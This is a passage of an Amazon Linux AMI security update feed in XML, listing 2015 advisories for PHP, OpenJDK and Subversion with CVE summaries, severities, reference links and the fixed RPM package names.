version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package 
name="php55-gd" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.28" release="1.106.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-dba-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.28" 
release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-devel" 
version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.28-1.106.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-585</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-585: medium priority package update for php56</title><issued date="2015-08-17 12:46:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6833:
A flaw was found in the way PHP&#039;s Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1283702:
CVE-2015-6833 php: Files from archive can be extracted outside of destination directory using phar
CVE-2015-6832:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256322:
CVE-2015-6832 php: dangling pointer in the unserialization of ArrayObject items
CVE-2015-6831:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256290:
CVE-2015-6831 php: Use After Free Vulnerability in unserialize()
CVE-2015-5590:
1245242:
CVE-2015-5590 php: buffer overflow and stack smashing error in phar_fix_filepath
CVE-2015-5589:
1245236:
CVE-2015-5589 php: segmentation fault in Phar::convertToData on invalid file
CVE-2015-3152:
1217506:
CVE-2015-3152 mysql: use of SSL/TLS can not be enforced in mysql client library (oCERT-2015-003, BACKRONYM)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152" title="" id="CVE-2015-3152" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5589" title="" id="CVE-2015-5589" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590" title="" id="CVE-2015-5590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831" title="" id="CVE-2015-6831" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832" title="" id="CVE-2015-6832" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833" title="" id="CVE-2015-6833" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mbstring" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.12" release="1.116.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-odbc-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.12" release="1.116.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-tidy-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package 
name="php56-ldap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.12" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.12-1.116.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.12" release="1.116.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-tidy-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.12" 
release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.12-1.116.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.12" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.12-1.116.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-586</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-586: important priority package update for java-1.6.0-openjdk</title><issued date="2015-08-24 22:26:00" /><updated date="2015-08-24 22:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4760:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4749:
It was discovered that the JNDI component in OpenJDK did not handle DNS resolutions correctly. An attacker able to trigger such DNS errors could cause a Java application using JNDI to consume memory and CPU time, and possibly block further DNS resolution.
CVE-2015-4748:
A flaw was found in the way the Libraries component of OpenJDK verified Online Certificate Status Protocol (OCSP) responses. An OCSP response with no nextUpdate date specified was incorrectly handled as having unlimited validity, possibly causing a revoked X.509 certificate to be interpreted as valid.
CVE-2015-4733:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4732:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4731:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4000:
A flaw was found in the way the TLS protocol composed the Diffie-Hellman (DH) key exchange. A man-in-the-middle attacker could use this flaw to force the use of weak 512 bit export-grade keys during the key exchange, allowing them to decrypt all traffic.
CVE-2015-2808:
A flaw was found in the RC4 encryption algorithm. When using certain keys for RC4 encryption, an attacker could obtain portions of the plain text from the cipher text without the knowledge of the encryption key.
CVE-2015-2632:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-2628:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-2625:
A flaw was found in the way the JSSE component in OpenJDK performed X.509 certificate identity verification when establishing a TLS/SSL connection to a host identified by an IP address. In certain cases, the certificate was accepted as valid if it was issued for a host name to which the IP address resolves rather than for the IP address.
CVE-2015-2621:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-2601:
It was discovered that the JCE component in OpenJDK failed to use constant time comparisons in multiple cases. An attacker could possibly use these flaws to disclose sensitive information by measuring the time used to perform operations using these non-constant time comparisons.
CVE-2015-2590:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2590" title="" id="CVE-2015-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2601" title="" id="CVE-2015-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2621" title="" id="CVE-2015-2621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2625" title="" id="CVE-2015-2625" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2628" title="" id="CVE-2015-2628" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2632" title="" id="CVE-2015-2632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2808" title="" id="CVE-2015-2808" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4731" title="" id="CVE-2015-4731" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4732" title="" id="CVE-2015-4732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4733" title="" id="CVE-2015-4733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4748" title="" id="CVE-2015-4748" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4749" title="" id="CVE-2015-4749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4760" title="" id="CVE-2015-4760" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1526.html" title="" id="RHSA-2015:1526" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.36-1.13.8.1.71.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.36" release="1.13.8.1.71.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.36-1.13.8.1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-587</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-587: medium priority package update for subversion mod_dav_svn</title><issued date="2015-08-24 22:27:00" /><updated date="2015-08-24 22:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0251:
It was found that the mod_dav_svn module did not properly validate the svn:author property of certain requests. An attacker able to create new revisions could use this flaw to spoof the svn:author property.
1205140:
CVE-2015-0251 subversion: (mod_dav_svn) spoofing svn:author property values for new revisions
CVE-2015-0248:
An assertion failure flaw was found in the way the SVN server processed certain requests with dynamically evaluated revision numbers. A remote attacker could use this flaw to cause the SVN server (both svnserve and httpd with the mod_dav_svn module) to crash.
1205138:
CVE-2015-0248 subversion: (mod_dav_svn) remote denial of service with certain requests with dynamically evaluated revision numbers
CVE-2015-0202:
The mod_dav_svn server in Subversion 1.8.0 through 1.8.11 allows remote attackers to cause a denial of service (memory consumption) via a large number of REPORT requests, which trigger the traversal of FSFS repository nodes.
1205134:
CVE-2015-0202 subversion: (mod_dav_svn) remote denial of service with certain REPORT requests
